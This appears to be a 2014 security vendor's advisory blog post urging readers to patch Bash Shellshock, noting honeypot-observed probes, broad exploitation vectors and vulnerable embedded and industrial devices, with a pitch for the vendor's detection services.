If you haven’t paid attention to the Bash Shellshock vulnerability – NOW IS THE TIME!
Source IPs for probes looking for the vulnerability are growing slowly in number and scope of scans. (As of 9/30/14, 10am Eastern).
There are many vulnerable devices and systems available to exploit and a variety of exploitation vectors exist – including web CGIs, DHCP clients, OpenVPN, SSH, etc. It is highly likely that a wide variety of embedded systems are also vulnerable that meet these capabilities. So far, we have seen attack traffic in the HITME coming from a few SOHO routers and a couple of other embedded network devices. Items like printers, some routers & managed switches, home gadgets, cameras, etc. are likely targets as well.
In the industrial control world, there are a variety of embedded devices leveraging Linux at the core, and many with exposed CGI mechanisms for remote management and monitoring. These need to be inspected as well, as they may also prove vulnerable and potentially exploitable via one or more vectors. Patching may require firmware upgrades in some cases. Contact the vendor for more information.
But, no matter what systems you use and manage, NOW IS THE TIME. Pay attention to this issue and get moving on patching, adding compensating controls and rolling forward with enhanced detection mechanisms. GET BUSY!
As always, if we can assist, feel free to give us a call or drop us a line. We have HoneyPoint emulations for HPSS clients that can help identify sources of traffic and we have assessment signatures for up to the moment known attack vectors. Let us know if we can help!
Thanks for reading, and stay safe out there!
UPDATE: Good news on Shellshock for embedded devices: If it runs BusyBox, it’s likely NOT vulnerable.